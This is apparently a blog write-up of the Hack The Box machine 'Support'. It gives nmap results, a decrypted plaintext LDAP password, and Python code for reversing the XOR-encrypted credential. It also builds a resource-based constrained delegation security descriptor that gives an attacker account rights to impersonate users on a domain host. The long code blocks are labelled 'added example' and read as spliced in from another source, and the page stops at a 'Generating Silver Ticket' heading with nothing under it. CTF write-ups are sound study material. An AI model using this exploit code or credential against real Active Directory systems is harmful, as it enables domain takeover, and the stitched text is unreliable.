Hackthebox - Support

nmap

# Nmap 7.92 scan initiated Sun Jul 31 00:30:10 2022 as: nmap -sC -sC -vvv -oN nmap/support 10.129.25.223
Nmap scan report for 10.129.25.223
Host is up, received echo-reply ttl 127 (0.18s latency).
Scanned at 2022-07-31 00:30:11 IST for 59s
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127

Host script results:
| smb2-time:
| date: 2022-07-30T19:00:19
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: -16s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 24642/tcp): CLEAN (Timeout)
| Check 2 (port 33552/tcp): CLEAN (Timeout)
| Check 3 (port 60212/udp): CLEAN (Timeout)
| Check 4 (port 41152/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked

Read data files from: /usr/bin/../share/nmap
# Nmap done at Sun Jul 31 00:31:10 2022 -- 1 IP address (1 host up) scanned in 60.11 seconds

SMB Shares

Files in support-tools

UserInfo

The username and password appear to be encrypted with armando as the key and

Using replit to reverse the routine, we get the decrypted credentials:

support\\ldap
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
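As an added example (not the write-up's own replit code), here is the decryption reproduced in Python, plus the forward direction and a known-plaintext key recovery that shows why this scheme offers no protection. The key `armando` and the recovered password come from this page; the base64 ciphertext and the second XOR operand 0xDF are the values carried by UserInfo.exe on the box and are not shown on this page, so they are stated as assumptions here.

```python
import base64

# Constructed inputs. ENC_PASSWORD_B64 and MASK are assumed from UserInfo.exe on
# the box (neither appears on the page); KEY and the expected plaintext do.
ENC_PASSWORD_B64 = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
KEY = b"armando"
MASK = 0xDF  # every byte is XORed with the key byte and then with 223


def xor_stream(data: bytes, key: bytes, mask: int) -> bytes:
    """Repeating-key XOR followed by a constant mask; the operation is its own inverse."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] ^ mask for i, b in enumerate(data))


def decrypt(blob_b64: str, key: bytes = KEY, mask: int = MASK) -> str:
    """Mirror the binary's decryption routine: base64-decode, then XOR with key and mask."""
    return xor_stream(base64.b64decode(blob_b64), key, mask).decode("ascii")


def encrypt(plaintext: str, key: bytes = KEY, mask: int = MASK) -> str:
    """Forward direction, to show the scheme is symmetric."""
    return base64.b64encode(xor_stream(plaintext.encode("ascii"), key, mask)).decode("ascii")


def recover_key(blob_b64: str, known_plaintext: str, mask: int = MASK) -> bytes:
    """Known-plaintext attack: ciphertext XOR plaintext XOR mask is the key stream,
    so the key is the shortest period of that stream. Works for any repeating key."""
    ct = base64.b64decode(blob_b64)
    pt = known_plaintext.encode("ascii")
    if len(ct) != len(pt):
        raise ValueError("known plaintext must be as long as the ciphertext")
    stream = bytes(c ^ p ^ mask for c, p in zip(ct, pt))
    for period in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % period] for i in range(len(stream))):
            return stream[:period]
    raise AssertionError("unreachable: the full stream is always a period")


if __name__ == "__main__":
    print(decrypt(ENC_PASSWORD_B64))
    print(recover_key(ENC_PASSWORD_B64, decrypt(ENC_PASSWORD_B64)))
```

Because the key is hard-coded in the client binary and the ciphertext is shipped beside it, anyone with a copy of the executable has everything needed; the key-recovery function also shows that a single known plaintext of 36 bytes leaks the whole 7-byte key, so rotating the "encrypted" string without changing the design gains nothing.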

Checking the credential against WinRM, we see that it is valid.

Privilege Escalation

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution
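The ired.team article linked above abuses resource-based constrained delegation by writing a security descriptor into the target computer's msDS-AllowedToActOnBehalfOfOtherIdentity attribute, granting an attacker-controlled machine account the right to act on behalf of other users to that computer. As an added example, not taken from this write-up or from ired.team, the code below builds that attribute value byte for byte (the SDDL form is O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;<SID>)) and parses one back so a defender can list who has been delegated to a host. The domain SID and RID are made up, and the LDAP modify that writes the value is out of scope here.

```python
import struct

# Access mask written CCDCLCSWRPWPDTLOCRSDRCWDWO in SDDL: full control over the object.
FULL_CONTROL = 0x000F01FF
ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACL_REVISION_DS = 0x04
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"  # the "O:BA" owner of the descriptor

# Constructed sample: a fictitious domain and an attacker-controlled machine account.
FAKE_DOMAIN = "S-1-5-21-1111111111-2222222222-3333333333"
ATTACKER_COMPUTER_SID = FAKE_DOMAIN + "-1105"


def sid_to_bytes(sid: str) -> bytes:
    """Encode 'S-1-5-21-...' as a binary SID: revision, count, 48-bit authority, RIDs."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S" or parts[1] != "1":
        raise ValueError(f"not a SID: {sid!r}")
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", 1, len(subs))
            + int(parts[2]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(buf: bytes, off: int) -> str:
    """Decode the binary SID that starts at buf[off]."""
    revision, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from(f"<{count}I", buf, off + 8)
    return f"S-{revision}-{authority}" + "".join(f"-{s}" for s in subs)


def build_rbcd_descriptor(principal_sid: str) -> bytes:
    """Self-relative security descriptor with one ACCESS_ALLOWED ACE giving
    principal_sid full control; this is the raw value for
    msDS-AllowedToActOnBehalfOfOtherIdentity on the target computer."""
    sid = sid_to_bytes(principal_sid)
    ace = struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid), FULL_CONTROL) + sid
    dacl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(ace), 1, 0) + ace
    owner = sid_to_bytes(BUILTIN_ADMINISTRATORS)
    owner_off = 20                       # size of the SECURITY_DESCRIPTOR_RELATIVE header
    dacl_off = owner_off + len(owner)
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         owner_off, 0, 0, dacl_off)  # no group SID, no SACL
    return header + owner + dacl


def delegation_principals(sd: bytes) -> list[str]:
    """Walk a self-relative SD and return every SID granted access in its DACL.
    Run over a computer's msDS-AllowedToActOnBehalfOfOtherIdentity to see which
    accounts may impersonate users to it; returns [] for an empty or malformed value."""
    if len(sd) < 20:
        return []
    revision, _, control, _, _, _, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if revision != 1 or not (control & SE_SELF_RELATIVE) or not (control & SE_DACL_PRESENT) or dacl_off == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, dacl_off)
    off = dacl_off + 8
    sids = []
    for _ in range(ace_count):
        ace_type, _, ace_size, _ = struct.unpack_from("<BBHI", sd, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sids.append(sid_from_bytes(sd, off + 8))
        off += ace_size
    return sids


if __name__ == "__main__":
    blob = build_rbcd_descriptor(ATTACKER_COMPUTER_SID)
    print(blob.hex())
    print(delegation_principals(blob))
```

Writing this blob requires write access to the target computer object, which is the precondition the linked article depends on; once it is in place, a service ticket obtained through S4U2Self and S4U2Proxy as the delegated machine account carries the impersonated user's identity to the target. On the defensive side, any non-empty msDS-AllowedToActOnBehalfOfOtherIdentity on a domain controller or other tier-0 host deserves a look, and the parser above turns the binary value into a SID list that can be resolved and reviewed.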

Generating Silver Ticket

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/support/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.